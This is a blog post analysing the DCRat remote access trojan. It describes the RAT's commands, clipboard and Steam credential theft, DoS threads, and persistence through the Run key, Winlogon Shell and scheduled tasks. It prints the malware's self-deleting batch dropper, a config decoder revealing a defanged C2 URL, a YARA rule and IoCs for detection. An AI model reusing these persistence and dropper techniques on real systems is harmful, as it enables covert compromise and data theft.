A deep dive into DCRAT/DarkCrystalRAT malware

20 minute read

بسم الله الرحمن الرحيم

FreePalestine

Introduction

Dark Crystal RAT or DCRat is a typical RAT that has been around since at least June 2019. The RAT has ability to do many malicious code such as Power options like shutdown, reboot, or logoff the system, Enumerate operations like enumerate processes, folders, or drives, Execute code like CS, VB, VBS, PS, and create Denial of Service DoS. We will start to deep dive into its capabilities in this blog.

Technical summary

Action	Description
Power options	Reboot and shutdown the system and log off the current user.
Enumerate operations	Enumerate processes and retrieve information such as executable paths, folders, drives, screens, microphones, and cameras.
Clipboard grabber	Retrieve data from the clipboard, such as files or text.
Execute CS, VB, VBS, PS	Run and compile code inside the victim’s system, including C#, VB code, and scripts in bat, VBS, or PS.
Denial of Service (DoS)	Perform a Denial of Service (DoS) attack using the victim’s computer.
Take screenshots	Capture screenshots from the victim’s computer screen and obtain the screen’s width and height.
Steal Steam credentials	Target Steam gaming platform users and attempt to steal Steam credentials from the victim’s user.
Retrieve Telegram and Discord path	Obtain the installation path of Telegram and the path of local database files of Discord.
System info	Query and retrieve information about the victim, such as IP address, hostname, country, and more.
Persistence	Maintain persistence by modifying the registry, such as the Winlogon and run registry keys, and create scheduled tasks.

Commands

The malware get commands from C2 to do malcious functions inside Class30 class, specifically inside C7y method.

Figure: Commands and malicious functions

The malware gets the struct7_0 as an input which contains values of command and data from dictionary2 dictionary. The value of command from dictionary2 dictionary is returned by RL4 method. Then the value is hashed using SHA256 then take the first 4 bytes (32 bits) of the hash and convert to a uint then calculate the 6-digit hash by taking modulo (%) 1,000,000.
This done by w_compute_SHA256_return_6_digits method.

Figure: w_compute_SHA256_return_6_digits method

The implementation in python.

import hashlib
import struct

def smethod_1(string_0):
    sha256 = hashlib.sha256()
    sha256.update(string_0.encode('utf-8'))
    hash_hex = sha256.hexdigest()

    # Convert the first 4 bytes (32 bits) of the hash to a uint
    hash_value = struct.unpack('<I', bytes.fromhex(hash_hex[:8]))[0]

    # Calculate the 6-digit hash by taking modulo 1,000,000
    result = hash_value % 1000000

    return result

input_string = "command"
hash_value = smethod_1(input_string)
print("Hash: {:06d}".format(hash_value))

Power options

Inside ba1 method, The malware starts a process which can reboot the victim’s device immediately using shutdown.exe /r /f /t 0.

Figure: reboot the system immediately

Or inside Class25 method, the malware starts a process which can but logoff the system shutdown.exe /l /f /t 0

Figure: logoff the system immediately

Or the malware can shutdown the the victim’s device

Figure: Shutdown the system immediately

Enumerate operations

Enumerate Processes and their executable

Inside avS method, the malware has the ability to enumerate the currently running processes on the system and retrieve the full path to the executable file associated with the process. The malware setup a dictionary which holds:

Column	Value Description
`N`	Name of the executable associated with the process (ProcessName + `.exe`).
`T`	The window title of the process (WindowTitle + “ “).
`I`	The process ID (processId + “ “).
`S`	`1` when the process ID is the same as the ID of the current process, which is the malware process.
`P`	The full path to the executable file associated with the process using `QueryFullProcessImageName`. If it fails to retrieve the full path, `Memory` is used as a placeholder.

Figure: Enumerate Processes and retrieve thier associated executable

Enumerate Drives

Inside W1W method, the malware has the ability to retrieve information about drivers of the victim’s computer such as type, name, size, and description.

It startup a dictionary which contains:

Column	Value Description
`T`	`Drive`
`N`	Drive name
`S`	Size of the drive
`M`	Description of the drive, including the volume label, drive type, and drive format

Figure: Enumerate Drives

Enumerate folders

Inside CmN method, this method retrieve information about files and directories within a specified directory and return that information in a structured format. If it’s a directory/folder:

Column	Value Description
`T`	`Folder`.
`N`	the name of the directory.
`S`	empty string “”.
`M`	the last modified time of the directory in the format `dd.MM.yyyy HH:mm`.

If it’s a file:

Column	Value Description
`T`	`File`.
`N`	the name of the file.
`S`	the size of the file.
`M`	the last modified time of the file in the format `dd.MM.yyyy HH:mm`.

Figure: Enumerate folders or files

Enumerate screens

The malware will try to enumerate number of available screens and their device names.

Figure: Enumerate screens

Enumerate Cameras

The code will retrieve info about the camera devices on the system.

Figure: Enumerate cameras

Enumerate Microphones

The malware will retrieve info about the audio input devices using the Windows Multimedia API (winmm.dll) and return a list of audio input device names.

Figure: Enumerate Microphones

Clipboard grabber

The malware will try to grab data from Clipboard.

Figure: grab data from Clipboard

Inside the GetText method, the malware retrieves text data from the clipboard in a specified format such as UnicodeText, Text, HTML by using Clipboard.GetDataObject() which retrieve the current contents of the clipboard.

Figure: How to grab data from Clipboard

The malware will try to save the content of the clipboard and It checks if there are file drops in the clipboard using Clipboard.ContainsFileDropList() to save it to Clipboard [Files].txt file or it checks if it’s text to save it to Clipboard [Text].txt file.

Figure: Save Clipboard data

Show notifications

Inside atR method, the malware can show notifications on the victim’s computer such as information, warning, confirmation, or error.

Figure: Show Message box with a text

Execute CS, VB, VBS, PS

The malware can compile and run code such as C# or Visual Basic , run VBS script, powershell script, and batch script inside the victim’s computer.

First, the malware will check the type to determine how it will be executed. If its type is C# or VB:

If it’s C# code, it creates a CSharpCodeProvider instance which allows you to dynamically compile C# source code. If it’s a VB code, it creates a VBCodeProvider instance which allows you to dynamically compile VB source code.
Before compiling using CSharpCodeProvider or VBCodeProvider, the code configures the compilation process by using CompilerParameters. The parameters are GenerateInMemory and GenerateExecutable.
It sets GenerateInMemory to true and sets GenerateExecutable to false to make sure that the compiled code is generated inside the memory not compiled as an executable file on disk.
Then compile the provided code using CompileAssemblyFromSource. If there are compilation errors, it collects the error number, line, and error text.
If there are no errors, the malware creates an instance of the class DCRAT.code and invoke the Main method to execute the code dynamically.

Figure: Check if the type is CS or VB

Figure: Check if errors happen then execute

If the Type is BAT which is batch .bat file, the malware will write the code from dictionary["Code"] value in the random-string-generated file which located in the temp file.
The code will run the batch file using two ways which are determined by the value of dictionary2["Hidden"]:

If the value of dictionary2["Hidden"] if true, It means that the file will run and won’t show the command-line window.
If the value of dictionary2["Hidden"] if false, the file will run and will show the command-line window.

After executing the file, the batch file will be deteted.

Figure: How it runs the bat script

If it’s VBS script, the code will run the VBS script using cscript.exe which is Windows Script Host executable which is resposible for running VBS scripts.
After executing the file, the batch file will be deteted.

Figure: How it runs the VBS script

If it’s a powershell PS script, the code will run the PS script in a hidden window using powershell.exe.

Figure: How it runs the PS script

Take screenshots

Inside the uKl method, the malware has the ability to take screenshots from the victim’s computer screen and get the width and hight of the screen.

Figure: uKl method

The malware will start a thread to start taking screenshots from the victim’s computer and save it a byte array of JPEG format, then upload files to the C2.

Figure: Capture screenshots

Download File

Inside Class19 method, the malware can download a file from a specific URL and save the file inside a specific directory inside the victim’s device.

Figure: Downlaod file

Run a specific file

Inside Class32 method, the malware can run a file from victim’s computer by starting a process with different windowstyle such as the window is Hidden, Minimized, or Maximized.

Figure: run the downlaoded file

Write bat file in temp

The malware write a .bat file with a random-string-generated name in the temp path. And write this batch script in the .bat file:

@echo off
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2  1>nul
start "" "C:\Users\username\Start Menu\SearchProtocolHost.exe"
del /a /q /f "C:\Users\username\AppData\Local\Temp\\sr3bn8JpP4.bat"

@echo off : It ensures that the commands are not displayed in the console window while they are executed.
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul: This command uses the Windows Time Service (w32tm) to retrieve time-related information, /computer:localhost Specifies that the time-related information should be collected from the local computer, /period:5 get the data collection period to 5 seconds, /dataonlyget only the data values should be displayed, /samples:2 Specifies the number of samples to collect, and 1>nul not to show any output.
start "" "C:\Users\username\Start Menu\SearchProtocolHost.exe": launch a new process of the SearchProtocolHost.exe and the window has an empty title.
del /a /q /f "C:\Users\username\AppData\Local\Temp\\sr3bn8JpP4.bat": Then delete the .bat file.

After writing the script into the BAT file, it is launched in a new process (with admin privileges).

Figure: batch script

Downlaod and execute

In this method, the malware will download an exe file inside the temp folder, and execute the file using batch .bat file. Inside the batch file, it starts the downloaded file (text) in a new process and then delete the .bat file.

Figure: Downlaod a exe file and execute it

Denial of Service DoS

The malware has the ability to perform a Denial of Service DoS attack using victim’s computer. The malware will start a number of threads as we will explain next.

Figure: Prepare threads to send a file

First, the malware will start a thread to run the HF6 method. Inside this method, the malware will create a TCP connection with the targeted remote host or IP address . And send a simple POST request to the target then sleep for 100 millisecondss.

Figure: First thread to prepare the connection

Then, the malware will launch a thread of method_0 method. In this method, the malware will start setting up a Socket for sending UDP packets to the remote host using SendTo and The size of each packet is determined by the result of w_Generate_random_numbers()% 1000 + 1. And between each packet, the thread sleeps for 100-millisecond.

Figure: setting up a Socket for UDP flood attack

In third thread, it’s doing the same function but sending TCP packets to the remote host instead of UDP packets.

Figure: setting up a Socket for sending TCP packets

Steal Steam credintials

Action	How to
Get Steam path	Retrieve the value of `SteamPath` inside the `SOFTWARE\\Valve\\Steam` registry key.
Language	Retrieve the value of `Language` inside the `SOFTWARE\\Valve\\Steam` registry key.
Login Users	Retrieve the value of `AutoLoginUser` inside the `SOFTWARE\\Valve\\Steam` registry key.
Steam IDs	Parse the `loginusers.vdf` file to obtain Steam user IDs.
Steam Apps	Retrieve a list of game names in the Steam gaming platform.

Figure: Return Steam users

Figure: Return Steam IDs

Get Telegram path

The malware will try to get the installation path of Telegram by searching for (\\w\\W.+)Telegram.exe using regex and get the path or by searching for specific parocesses names related to Telegram such as Telegram, Kotatogram and get the get the executable path of the process using w_QueryFullProcessImageName API.

Figure: Get Telegram path

Get Discord path

In this code, it determines the path of the local Database files of Discord.

Figure: Get Discord path

System info

Inside the o4V method, the malware will decode the aHR0cHM6Ly9pcGluZm8uaW8vanNvbg== from Base64 which its value will be https://ipinfo.io/json. The code will query and retrieving information about the victim such as IP, hostname, country, and more.

Figure: Retrieve info such as IP or the location

Then inside method_1 method, the malware will retrieve additional info such as PCName, UserName, WindowsVersion, ACTiveWindow and much more

Figure: Retrieve additional info

Then save the retreived info and save it to a .txt file and send it to the C2.

Persistence

The malware will try to stay active when the system is rebooted and stay undetected to do its malicious activities.
The malware uses two methods: using scheduled task and edit registry.

The malware will execute using schtasks.exe to create scheduled task.
- The first command, it creates a new scheduled task with the our sample, The task is trigger every minute with a random delay between (5, 15) seconds.
- the second command, it does the first command and specifies that the task will run when the user logs on, sets the privilege of the task to HIGHEST

Figure: Create scheduled tasks for persistence

The malware can delete the scheduled tasks for some reasons.

Figure: Delete scheduled tasks

the second way is to modify registries
- Opens the Software\Microsoft\Windows\CurrentVersion\Run key, add a registry its name is the sample name without extension, and its value is the "path/to/sample/fullsamplename".
- Opens "Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon, retrieve the value of Shell registry, then append the "path/to/sample/fullsamplename". Shell registry determines which program is used as the system shell when a user logs into Windows.

Figure: modify registries

Here we can see that the malware deletes the added registries from before.

Figure: Delete registries

Configuration decryption

In the next figure, We see the method config_dec which contains a base64 string which starts with a base64 encoded zipped string (H4sIAA*).

Figure: encoded string starts with zipped string

From embee-research blog, we will try to explain how the malware encodes the configuration. First, We will decode the base64 string then we will decompress (unzip) it. Then we will reverse the characters of the string then we decode the result from base64 string.
Open CyberChef and put the encoded string in input:

From Base64 + Gunzip + reverse + From Base64 + unescape string( to clean the string from \).

Figure: decoded configuration from config_dec

From the decoded Configuration, we can get that:

SCRT and PCRT dictionaries is used to decrypt another strings as we will see in the blog.
Mutex: qrXivo3mkbeXpHSqt4kC
Enabled features:

    
            Expand to see more
        
 cookies

 passwords

 forms

 cc

 history

 telegram

 steam

 discord

 filezilla

 screenshot

 clipboard

 sysinfo

 searchpath:"%UsersFolder% - Fast

 AS

When we scroll down, we see another base64 string which starts with base64 encoded zipped string (H4sIAA*).
The malware decode the base64 string then decompresses (unzip) it. Then the malware uses the previous decoded string from config_dec and get ["SCRT"] dictionary to use it to replace values from the decoded string in c2_config method with ["SCRT"] dictionary. Then reverse the characters of the string. Then we decode it from base64 again.

Figure: encoded configuration from c2_config

As we can see inside the w_replace_values method, we see that it replaces values of the decoded string of c2_config with the ["SCRT"] dictionary keys.

Figure: Replacing values with keys c2_config inside w_replace_values

we can use this script to decode the encoded string and get the C2.

import base64,gzip

#Create Dictionary obtained from previous decoding
A1 = {"SCRT":{"Q":")","a":"_","m":"(","I":"^","M":"`","j":"$","v":"#","Y":" ","h":"@","8":"!","4":"|","s":"&","D":"~","1":"*","P":".","N":"<","W":"-","y":">","U":",","3":";","2":"%"},"PCRT":{"0":"%","I":")","G":",","T":"&","y":";","R":"~","l":"(","j":"@","X":"-","p":"`","x":"_","S":".","d":">","U":"|","e":" ","w":"#","b":"!","Y":"$","=":"*","9":"^","M":"<"}}

#Store string from from encoding                                                                                  
zip_encoded = "H4sIAAAAAAAEABXMwQqCMBgA4FdRUpnixIuBuGQrNJGBkOKhw6/YOoykvIyNCJ89PX6X7xS/QYNspD+DB5e+MlgMdO48gqbBuJZ37wWlM97dUGSdgy5iaTsmv5zowuGu74zq8SUHWzb6VolPvV2wtlJLCEUxBUuJm+1RSzk5BvVBecX7q5JikGUYpSzm5uXwjHWjslaSb29m5/zIKhFTBEdoR6jz5x/oSq6sqAAAAA=="
unzip_decoded = str(gzip.decompress(base64.b64decode(zip_encoded)))
# print(unzip_decoded)
#Obtain the SCRT Dictionary
dictionary = A1["SCRT"]
# print(dictionary)
#Use the dictionary to perform a search/replace
#Making sure to replace the Value with the Key
# and not the other way around
for i in dictionary:
    unzip_decoded = unzip_decoded.replace(dictionary[i],i)

# print("First round of Decoding: \n" + unzip_decoded + "\n")

#Reverse the string
reverse_unzip_decoded = unzip_decoded[-1:0:-1]
#base64 decode again
decoded = base64.b64decode(reverse_unzip_decoded)
#print the result
print("Second round of decoding: \n" + str(decoded))

The output will be: b'{"H1":"http://77[.]246[.]107[.]91/@==AbhNnclZXauVlclZnclNXZulGT","H2":"http://77[.]246[.]107[.]91/@==AbhNnclZXauVlclZnclNXZulGT","T":"0"}'

After the malware decode the C2 configuation, the malware generate a random number between (100, 10000) to pause the thread for that randomly generated amount of time.

C2 communications

After resuming the thread, the malware checks if T in the C2 config is 1 which in our case is 0. If the T is 1, the malware uses WebClient to make HTTP requests using a custom User-Agent header and specify a specific MIME type in the request.

Figure: WebClient to make HTTP requests

Inside the sAA method

Figure: sAA method

First, the malware generate a random text which cosists of two parts each part contains number of characters between (2, 32) and separate the two parts with =. Then save it in text variable which will be used later.

Figure: Generate random text

Then we enter the for loop, method_0 contains "http://77[.]246[.]107[.]91/@==AbhNnclZXauVlclZnclNXZulGT" and method_1 contains "http://77[.]246[.]107[.]91/@==AbhNnclZXauVlclZnclNXZulGT". We will try to explain how the malware construct the URL request

The text2 contains the C2 "http://77[.]246[.]107[.]91/@==AbhNnclZXauVlclZnclNXZulGT".
Split text3 with @, then text3 conatins "http://77[.]246[.]107[.]91/".
The malware will decode the ==AbhNnclZXauVlclZnclNXZulGT string within the URL which is reversed and then decoded form base64 which will be LineserverUniversal. The text4 contains LineserverUniversal.
Create MD5 hash of 77.246.107.91gettoken.
Create MD5 hash of 77.246.107.91.
Create MD5 hash of 77.246.107.91token_uid
The value of zl3.x83 variable is determined by:
the d51 method has ["MUTEX"] the mutex as a parameter "DCR_MUTEX-qrXivo3mkbeXpHSqt4kC".\
var_version_number contains 4.5.33
from D9a method we get that, get the OS, get the system directory, MachineName, username, process count, type of OS, path to the current user, total size of drivers. Then the value will be hashed using SHA1.
Get_MachineName has the MachineName such as FOLAN-PC.
Get_UserName has the UserName such as folan.
The value of the mutex "DCR_MUTEX-qrXivo3mkbeXpHSqt4kC" is hashed using SHA1.
After getting the value of zl3.x83, the value will be decrypted using SHA1 + SHA1 again + To Base64 (and remeove = at the end) + reverse characters.

After these operations, the URL request will be like this:
http://77[.]246[.]107[.]91/LineserverUniversal[.]php?S0s2r66zY1djVBwZ1altYRNw3fz0a=Drr2V0tR&bac6c8eb8980430e52de074e8ac708b2=d150a0b3e170c11c5606292418404eed&66aba1f0bc95f01c05b9d5c9b7ca2004=AMkVWZ0QTZjRzN5IWZ0YjN5IDOihDNwATY3kTMzMWO1MWN2M2NxEzY&S0s2r66zY1djVBwZ1altYRNw3fz0a=Drr2V0tR

text3: http://77[.]246[.]107[.]91/
text4: LineserverUniversal + .php?
text: S0s2r66zY1djVBwZ1altYRNw3fz0a=Drr2V0tR + &
MD5 hash of 77.246.107.91gettoken : bac6c8eb8980430e52de074e8ac708b2 + =
MD5 hash of 77.246.107.91: d150a0b3e170c11c5606292418404eed + &
MD5 hash of 77.246.107.91token_uid = 66aba1f0bc95f01c05b9d5c9b7ca2004 + =
The value of zl3.x83: AMkVWZ0QTZjRzN5IWZ0YjN5IDOihDNwATY3kTMzMWO1MWN2M2NxEzY + &
text: S0s2r66zY1djVBwZ1altYRNw3fz0a=Drr2V0tR

Commands table

Hash	Action
489540U 214916U	Take screenshot, mouse events, keyboard events
18691U	Create a Zip of directory
134266U	Reboot the system
281864U	Shutdown the system
334551U	Logoff from the current user
379238U	Enumerate Processes and their executable
414986U 12926U	Download file
526922U	Run a process
549717U	Enumerate drives
677710U	Run shell command
750724U	Delete all files from PC
859704U	Uninstall malware
872468U	Show MessageBox window
909989U	Create a new directory
911819U	Retrieve file or process properties
950881U	Retrieve info about a specific folder
38889U	Clipboard grabber
44265U	Download and execute file
160478U	Send UDP and TCP packets to a given IP (DDoS)
154753U	Download and execute cs, vb, vbs, ps, bat
788583U	Put text in clipboard
119627U	Open a URL
172941U 343584U	Kill a process
204675U	Show files of directory
225809U	Create paused notepad.exe process
299365U	Run file
322482U	Resume threads
940389U	Suspend threads
516557U	Delete directory
739465U	Copy directory
290226U	Move a file
687473U	Extract a zip file
163489U	Upload file to C2
922147U	Send collected info, plugins, clipboard data

Yara

rule DCRat {
    meta:
        author = "Muammad Hasan Ali @muha2xmad"
        date = "2023-09-03"
        description = "YARA rule for DCRat indicators"
    strings:
        $str001 = "cao28Fn172GnuaZvuO_OnSystemInfoO29PluginI2bG7" fullword wide
        $str002 = "uploadsafefile_name" fullword wide
        $str003 = "uploadfile_name" fullword wide
        $str004 = "searchpath" fullword wide
        $str005 = "runas" fullword wide
        $str006 = "@@EXTRACTLOCATION" fullword wide
        $str007 = "@@EXTRACT_EXISTING_FILE" fullword wide
        $str008 = "@@POST_UNPACK_CMD_LINE" fullword wide
        $str009 = "@@REMOVE_AFTER_EXECUTE" fullword wide
        $str010 = "ACTWindow" fullword wide
        $str011 = "Clipboard [Files].txt" fullword wide
        $str012 = "Clipboard [Text].txt" fullword wide
        $str013 = "ConfigPluginName" fullword wide
        $str014 = "saving...." fullword wide
        $str015 = "DCRat-Log#" fullword wide
        $str016 = "DCRat.Code" fullword wide
        $str017 = "EncTable" fullword wide
        $str018 = "OldPath" fullword wide
        $str019 = "[Clipboard] Saving information..." fullword wide
        $str020 = "[Plugin] Invoke:" fullword wide
        $str021 = "[Screenshot] Saving screenshots from" fullword wide
        $str022 = "[SystemInfromation] Saving information..." fullword wide
        $str023 = "stealerlogstatus" fullword wide

        $API01 = "UseShellExecute" fullword ascii wide
        $API02 = "FromBase64String" fullword ascii wide
        $API03 = "GZipStream" fullword ascii wide
        $API04 = "GetTempPath" fullword ascii wide
        $API05 = "SHA1Managed" fullword ascii wide
        $API06 = "SHA256Managed" fullword ascii wide

        $dir1 = "%AppData% - Very Fast\\AppData\\" fullword wide
        $dir2 = "%SystemDrive% - Slow" fullword wide
        $dir3 = "%UsersFolder% - Fast" fullword wide
        $dir4 = "%AppData% - Very Fast\\AppData\\" fullword wide
        $dir5 = "%UsersFolder% - Fast" fullword wide
        $dir6 = "%AppData% - Very Fast\\AppData\\" fullword wide

        $ext01 = ".bat" fullword wide
        $ext02 = ".vbs" fullword wide
        $ext03 = ".zip" fullword wide
        $ext04 = ".jpg" fullword wide
        $ext05 = ".exe" fullword wide
       
        $comm = "w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2  1>nul" fullword wide
       

    condition:
        uint16(0) == 0x5a4d and (15 of ($str*) and 5 of ($API*) and 3 of ($dir*) and 3 of ($ext*) and ($comm))
}

IoCs

Sample SHA256 hash: 80e9df6cbe742866f0a88ea550f4b66498417506b8b8b7a88ffd180f67056670
C2 and path: http://77[.]246[.]107[.]91/LineserverUniversal[.]php

Quote

فلَا عَادَت عُيونك مَلجًأ ولَا عُدنَا نَحْن اللَّاجئينَ

تم بحمد لله وبتوفيقه

Ref

Dcrat Deobfuscation - How to Manually Decode a 3-Stage .NET Malware

Share on

Twitter Facebook LinkedIn

Muhammad Hasan Ali